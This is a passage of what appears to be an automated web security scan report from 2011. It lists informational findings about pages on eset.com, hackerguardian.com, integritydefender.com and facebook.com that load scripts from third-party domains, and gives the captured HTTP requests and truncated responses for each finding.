X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.customermagnetism.com/css/global.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
24.58. http://www.eset.com/us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:14:28 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Mon, 25 Apr 2011 15:14:28 GMT
X-Varnish: 555646579
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
24.59. http://www.eset.com/us/business/products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21066
Date: Mon, 25 Apr 2011 12:52:44 GMT
X-Varnish: 1310965243
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
24.60. http://www.eset.com/us/business/server-security/linux-file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/server-security/linux-file

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17290
Date: Mon, 25 Apr 2011 12:58:48 GMT
X-Varnish: 1310977676
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
24.61. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25484
Date: Mon, 25 Apr 2011 15:17:24 GMT
X-Varnish: 555654660
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div style="padding:3px 0 20px 0">
   <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
24.62. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
24.63. http://www.eset.com/us/styles/store-new.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/styles/store-new.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 12:58:56 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26705
Date: Mon, 25 Apr 2011 12:58:56 GMT
X-Varnish: 1310977946
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
24.64. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.150.41
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 8179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/nogz-s5wETe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...
24.65. http://www.hackerguardian.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hackerguardian.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.hackerguardian.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:28:38 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 18249
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Hackerguardian Home
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.comodo.com/prices.js"></script>
<!--google-->
<script type="text/javascript" src="//google-analytics.com/urchin.js" >
</script>
...[SNIP]...
</span><script type="text/javascript" src="//forums.comodo.com/rss.php?i=1&amp;t=1&amp;l=1&amp;n=1&amp;d=1&amp;w=1&amp;url=http://www.comodo.com/rss.xml"></script>
...[SNIP]...
24.66. http://www.hackerguardian.com/javascript/functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hackerguardian.com
Path:   /javascript/functions.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /javascript/functions.js HTTP/1.1
Host: www.hackerguardian.com
Proxy-Connection: keep-alive
Referer: http://www.hackerguardian.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=212060173.; __utmxx=212060173.; __utmx_k_22582370=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:28:39 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 21:12:56 GMT
ETag: "18870-3998-49bcbcfee2600"
Accept-Ranges: bytes
Content-Length: 14744
Content-Type: application/x-javascript

function createCookie(name,value,days) {
   if (days) {
       var date = new Date();
       date.setTime(date.getTime()+(days*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
   }
   else var
...[SNIP]...
<div style="position:absolute;right:317px;top:24px;">');
document.write('<script type="text/javascript" src="http://c3.chatsupportlive.com/js/status_image.php?base_url=http://c3.chatsupportlive.com&l=comodo4support&x=78&deptid=190&"><a href="http://www.phplivesupport.com">
...[SNIP]...
24.67. http://www.integritydefender.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:44:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=dc2d6e2ab4b800fc3fe5b92b56c23862; path=/
Content-Type: text/html
Content-Length: 14234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script language="javascript" src="http://www.instantengage.com/IE_Utility.js"></script>
<script language="javascript" src="http://www.instantengage.com/IE_CStart.js"></script>
...[SNIP]...
24.68. http://www.integritydefender.com/about.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /about.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/buyerDetails.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script language="javascript" src="http://www.instantengage.com/IE_Utility.js"></script>
<script language="javascript" src="http://www.instantengage.com/IE_CStart.js"></script>
...[SNIP]...
24.69. http://www.integritydefender.com/account.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /account.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script language="javascript" src="http://www.instantengage.com/IE_Utility.js"></script>
<script language="javascript" src="http://www.instantengage.com/IE_CStart.js"></script>
...[SNIP]...
24.70. http://www.integritydefender.com/buyerDetails.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /buyerDetails.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /buyerDetails.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/personal.php
Cache-Control: max-age=0
Origin: http://www.integritydefender.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799
Content-Length: 62

amount=489&item_name=Basic+Personal+Services&page=details&Buy=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
